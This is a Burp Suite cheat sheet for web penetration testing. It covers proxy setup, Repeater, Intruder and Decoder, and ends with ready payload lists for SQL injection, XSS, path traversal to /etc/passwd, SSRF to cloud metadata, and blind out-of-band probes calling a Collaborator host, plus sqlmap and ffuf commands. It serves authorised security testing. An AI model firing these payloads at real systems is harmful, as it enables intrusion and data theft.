Skip to main content

Burp Suite Cheat Sheet

Setup & Proxy

Browser proxy:   127.0.0.1:8080
HTTPS:           Install Burp CA cert (http://burpsuite/cert)
Scope:           Target > Scope > Add target
Intercept:       Proxy > Intercept > On/Off

Keyboard Shortcuts

ShortcutAction
Ctrl+RSend to Repeater
Ctrl+ISend to Intruder
Ctrl+SSearch
Ctrl+ZUndo (in editors)
Ctrl+SpaceAutocomplete
F12Toggle intercept

Repeater

Used to manually replay and modify requests.

  1. Intercept a request → Ctrl+R (Send to Repeater)
  2. Modify request (headers, body, params)
  3. Click Send → inspect response
  4. Use < / > to compare request history

Tips:

  • Right-click → Change request method (GET ↔ POST)
  • Inspector panel shows parsed params
  • Follow redirections with Follow redirect

Intruder

Used for automated fuzzing and brute force.

Attack Types:
├── Sniper      — One payload set, one position at a time
├── Battering   — One payload set, all positions simultaneously
├── Pitchfork   — Multiple sets, one per position (paired)
└── Cluster     — Multiple sets, all combinations

Payload Types:
├── Simple list  — Load wordlist file
├── Numbers      — Numeric range/step
├── Brute force  — Character set, min/max length
└── Runtime file — Load during attack

Rate limiting (Community Edition):

Project Options > Connections > Throttle: 100ms

Scanner (Pro only)

Right-click request → Scan
Active scan:   Sends attack payloads (intrusive)
Passive scan:  Analyzes traffic only (non-intrusive)

Dashboard > New Scan > Crawl and Audit

Decoder

Quickly encode/decode values:

URL encode:     %20, %2F, %3D
Base64:         dXNlcjpwYXNz
HTML entity:    &lt; &gt; &amp;
Hex:            41 42 43
Gzip:           compressed bytes

Common Test Payloads

SQL Injection:

'
''
`
')
"))
' OR '1'='1
' OR 1=1--
admin'--
1 UNION SELECT NULL--

XSS:

<script>alert(1)</script>
<img src=x onerror=alert(1)>
"><script>alert(1)</script>
javascript:alert(1)
<svg onload=alert(1)>

LFI:

../../../etc/passwd
....//....//etc/passwd
%2e%2e%2f%2e%2e%2fetc/passwd
/etc/passwd%00
php://filter/convert.base64-encode/resource=index.php

SSRF:

http://127.0.0.1/
http://169.254.169.254/latest/meta-data/
http://[::1]/
http://0.0.0.0:22/

Match & Replace Rules

Proxy > Options > Match and Replace
Useful rules:
- Remove X-Frame-Options header
- Change User-Agent to mobile
- Add custom auth header to all requests
- Replace "admin=false" with "admin=true"

Burp Collaborator

Used to detect out-of-band vulnerabilities (SSRF, blind XXE, blind XSS).

Burp > Burp Collaborator client > Copy to clipboard
Paste in payloads:
- Blind SSRF: http://[collaborator].burpcollaborator.net
- Blind XXE: <!ENTITY % file SYSTEM "http://[collaborator]/">
- Blind XSS: <script src="http://[collaborator]"></script>

Export Requests for Tools

# Right-click request > Copy to file → save as request.txt
# Use with sqlmap:
sqlmap -r request.txt

# Use with ffuf:
ffuf -request request.txt -request-proto http -w wordlist.txt